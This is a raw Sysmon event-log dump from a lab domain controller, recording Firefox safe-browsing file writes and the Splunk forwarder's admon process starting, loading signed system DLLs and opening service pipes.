Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=E60B3ADA99F59467AA1DCDB81E7846B0,SHA256=2B89DA2B0BA847C7B0317DCCC27187A0363056E45FC0D648A944AC2948B77D8Efalsetrue 11241100x800000000000000057350558Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.600{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpset2021-11-12 12:19:10.600 23542300x800000000000000057350557Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.600{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 11241100x800000000000000057350556Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.600{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpset2021-11-12 12:19:10.600 734700x800000000000000057350555Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.584{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057350554Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.584{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057350553Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.584{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057350552Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:10.584{8B6011A9-5BBE-618E-66F3-04000000F101}8512\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x800000000000000057350551Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.584{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057350550Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:10.584{8B6011A9-5BBE-618E-66F3-04000000F101}8512\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x800000000000000057350549Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.584{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057350548Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.584{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057350547Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.584{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057350546Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.584{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057350545Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.584{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057350544Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057350543Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057350542Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057350541Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057350540Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057350539Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057350538Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057350537Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057350536Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057350535Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057350534Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057350533Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057350532Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057350531Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057350530Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057350529Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057350528Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057350527Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057350526Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057350525Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057350524Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057350523Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057350522Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057350521Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057350520Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057350519Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057350518Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x800000000000000057350517Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057350516Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057350515Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057350514Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057350513Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8trueSplunk, Inc.Valid 10341000x800000000000000057350512Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.568{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057350511Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.553{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057350510Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.554{8B6011A9-5BBE-618E-66F3-04000000F101}8512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057350509Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:10.553{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350508Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:10.553{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 